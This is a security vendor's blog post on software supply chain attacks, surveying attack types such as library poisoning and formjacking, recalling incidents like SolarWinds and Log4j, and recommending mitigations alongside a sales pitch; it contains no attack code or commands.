Dr. Eduardo Rocha, Senior Solutions Engineer & Security Analyst @ GlobalDots
09.05.2022
image 5 Min read

Software supply chain security is an enormous concern for businesses today. According to a 2021 Argon cybersecurity report, software supply chain attacks increased threefold in 2021 compared to the previous year. 

The constant race of companies to do things faster while delivering a better, richer user experience adds a multitude of vulnerabilities to the supply chain. Cybercriminals are exploiting these vulnerabilities and finding novel ways to launch attacks. 

As a result, supply chain attacks are evolving all the time. So, organizations need to understand the concepts of supply chain security risks and how to mitigate them.

How to Identify If Your Business Needs Supply Chain Security?

Orchestrating a supply chain attack requires sophistication and time. Cybercriminals still invest resources in such attacks because a successful endeavor can have far-reaching effects across multiple organizations.

Modern software and applications are not built from the ground up. Today most businesses use third-party vendors, APIs, and libraries. Cybercriminals use weak points in the software development pipeline to orchestrate supply chain attacks. 

For example, a hacker can compromise a library of a particular vendor or open-source software. When an organization uses that library, it ships products with embedded malicious code or malware to the end-user. A popular library might be in use across hundreds or thousands of organizations. Many products can get corrupted with a single manipulated library. Supply chain attacks have caused disruptions to industries like shipping, financial services, and healthcare. And they have been used to conduct cyber espionage against government agencies.

Any organization with external source dependency is vulnerable to supply chain attacks. Furthermore, cybercriminals like this kind of attack because they can infiltrate multiple organizations and products through a single entry point and use the organization’s reputation to spread the malicious code to unsuspecting consumers. 

Types of Supply Chain Attacks

Cybercriminals have developed multiple methods to take advantage of supply chain vulnerabilities. Here are some of the standard techniques used:

Exploiting Open-Source and Third-Party Code for RCE: Hackers seek opportunities to insert malicious code into open-source and vendor libraries. The corrupted library behaves like the original ones. When organizations use these libraries, hackers can use Remote Code Execution (RCE) attacks to take over systems to steal and destroy data.

Stolen Code-Sign Certificates to Spoof Updates: Code-sign certificates are used to validate the integrity and authorship of code. When cybercriminals gain access to code-sign credentials of a reputable company or vendor, they can use the certificate to insert fake updates into the software supply chain. Users of the code cannot distinguish the counterfeit updates from the real ones, and the final product is corrupted.

Compromised Identity and Access Management to Enter Systems: Maintaining passwords and network security is a high priority for organizations. However, employees often use weak passwords that hackers can easily crack. Moreover, lax audit trails can lead to open accounts of ex-employees. Hackers use the weaknesses in identity and access management to gain access to networks and insert malicious code into the software supply chain.

Formjacking: In a formjacking attack, cybercriminals inject malicious JavaScript code into the form of a website. When a user enters personal information like credit card info, phone number, and address into an online form, the cybercriminals use the malicious JavaScript code to send the personal information to their servers. The collected data can be used for identity theft scams. This kind of man-in-the-middle attack can go undetected as company servers might not detect the intrusion without proper surveillance. You can learn more about how to prevent formjacking from GlobalDot’s webinar “Crush Formjacking – Ensuring Website Protection and PCI Compliance.”

Recent Supply Chain Attack Examples

Over the recent years, supply chain attacks have become more sophisticated with far-reaching effects. Here are some examples of the latest attacks:

SolarWinds Supply Chain Attack: In 2020, the highly publicized SolarWinds attack shook the cybersecurity industry. Hackers infected SolarWinds’ Orion platform with malware (later named SUNBURST) that affected 18,000 customers, including multinational companies and government agencies like Cisco, SAP, Intel, Deloitte, Microsoft, NASA, the US Justice Department, and the US State Department. SUNBURST collected data from user systems and delivered it to hacker-assigned URLs.

Kaseya Supply Chain Ransomware Attack: In 2021, the Kaseya VSA endpoint management and monitoring tool was compromised through a supply chain attack. Russian cybercriminal syndicate REvil orchestrated the attack. It affected 50 of Kaseya’s direct customers, including Managed Service Providers (MSPs), with additional 800-to-1500 businesses affected due to the supply chain effect.

CloudFlare’s CDNJS RCE Vulnerability: In 2021, a vulnerability in CloudFlare’s CDNJS, a free and open-source content delivery network, created a remote code execution (RCE) attack risk for 4,041 JavaScript and CSS libraries. Read GlobalDots’ CloudFlare’s CDNJS RCE report[ to learn more.

LOG4J Vulnerability: In December 2021, the remote code execution vulnerability of LOG4J, a widely used open-source logging API for Java, created a software supply chain crisis. An estimated 3 billion devices might be affected by LOG4J vulnerability. Read GlobalDots’ LOG4J exposure report to learn more.

Improving Your Supply Chain Security

Supply chain risk mitigation requires a multi-dimensional approach.

Monitor and Understand Your Supply Chain

You should have a clear understanding of what components go into your product. Gaining visibility into your software supply chain will help you understand potential vulnerabilities in the development pipeline. A technology partner with knowledge and experience can help you pinpoint weaknesses in your supply chain security.

Software Composition Analysis (SCA) for Supply Chain Vulnerabilities

You can use software composition analysis tools like Synopsis Black Duck, WhiteSource Diffend, or ByteSafe to make sure the dependencies in your supply chain are safe and secure.

Supply Chain Threats Mean Data and Network Security Are Better Off Separated

Network security focuses on keeping the business running and protecting against attacks that stop operations. Data security focuses on keeping data from getting stolen or destroyed. Even though the processes might overlap, the separation of data security and network security makes the supply chain more resilient. 

IT can focus on protecting against attacks, while data security specialists can concentrate on making sure the data is secure even if an attack happens. For example, data security specialists can protect data using encryption at rest.

To hear how it’s done in practice, check out our most recent talk on this topic: 

Privacy by Design – Why Data Privacy & Security Officers Must Collaborate

Better data protection through zero trust principles and auditing vendors separately to protect data are considered more robust supply chain risk mitigation. Data is only valuable to cybercriminals if they can understand it. If you can protect the data during a network breach, your supply chain is safer.

Broaden Your Technology Approach to Supply Chain Security Through Implementing SOC

For more robust supply chain protection, change your approach to protecting your endpoints. Build a security operations center (SOC) to gain more visibility into all the endpoints in your supply chain. You can continuously monitor your network and understand the vulnerable points in the organization, especially the integration points of the software.

Conclusion

You cannot eliminate supply chain threats, but how your security architecture is built significantly impacts your risk level. Separating data & network protection is an excellent idea if applied to work seamlessly by experts. A technology partner who has a holistic view of your infrastructure is highly advised.

Are you having difficulty with your supply chain risk mitigation strategy? Contact GloabalDots to improve your supply chain security today.

Read More

RCE in Cdnjs and What It Means to You
Supply-Chain Data Protection
Francesco Altomare, Senior Sales Engineer @ GlobalDots 19.07.21

Last week, a researcher named RyotaK shared a clever supply chain vulnerability in Cloudflare’s highly popular hosted module called cdnjs, which runs on around 12% of all sites on the web. The module helps developers consume other popular packages and integrate them safely into their sites.  The vulnerability was in the cdnjs library update server […]

Read more
SIEM Optimization tips to Improve Your Cybersecurity Readiness
SOC as a Service
From our Partners 28.07.22

Simple SIEM Optimization Tips to Improve Your Cybersecurity Readiness.

Read more
The Common Cybersecurity Mistakes that Devastate Businesses
SOC as a Service
From our Partners 27.07.22

Cybercrime investigation is an arduous process that experts should perform because the consequence of doing it incorrectly can be devastating.

Read more
Unlock Your Cloud Potential
Schedule a call with our experts. Discover new technology and get recommendations to improve your performance.
Book a Demo